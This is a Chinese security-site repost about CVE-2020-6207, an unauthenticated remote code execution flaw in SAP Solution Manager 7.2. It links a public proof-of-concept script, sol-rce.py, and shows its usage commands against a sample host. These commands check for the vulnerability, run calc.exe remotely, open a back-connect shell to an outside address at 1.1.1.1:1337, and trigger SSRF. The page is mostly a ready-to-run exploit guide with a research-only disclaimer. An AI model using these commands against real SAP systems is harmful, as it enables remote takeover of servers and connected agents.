SAP_EEM_CVE-2020-6207-PoC

admin
admin
admin
137428
文章
113
评论
2025年4月1日23:39:16评论7 views字数 875阅读2分55秒阅读模式

SAP_EEM_CVE-2020-6207 PoC

SAP Solution Manager是德国思爱普(SAP)公司的一套集系统监控、SAP支持桌面、自助服务、ASAP实施等多个功能为一体的系统管理平台。该平台可以帮助客户建立SAP解决方案的生命周期管理,并提供系统监控、远程支持服务和SAP产品组件升级等功能。 SAP Solution Manager (User Experience Monitoring) 7.2版本中存在安全漏洞,该漏洞源于程序没有对服务进行任意的身份验证。攻击者可利用该漏洞入侵所有连接Solution Manager的SMDAgents。

漏洞细节:https://github.com/chipik/SAP_EEM_CVE-2020-6207/blob/main/Process.md

PoC for CVE-2020-6207 (Missing Authentication Check in SAP Solution Manager):https://github.com/chipik/SAP_EEM_CVE-2020-6207

Check

➜ python sol-rce.py -H 172.16.30.43 -P 50000 -c
Vulnerable! [CVE-2020-6207] - http://172.16.30.43:50000

Trigger RCE

python sol-rce.py -H 172.16.30.43 -P 50000 --rce calc.exe

Get BackConnect

➜ python sol-rce.py -H 172.16.30.43 -P 50000 --back 1.1.1.1:1337

SSRF

➜ python sol-rce.py -H 172.16.30.43 -P 50000 --ssrf http://1.1.1.1/chpk

sol-rce.py

https://github.com/chipik/SAP_EEM_CVE-2020-6207/blob/main/sol-rce.py

原文始发于微信公众号(骇客安全):SAP_EEM_CVE-2020-6207-PoC

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月1日23:39:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SAP_EEM_CVE-2020-6207-PoChttps://cn-sec.com/archives/3896294.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息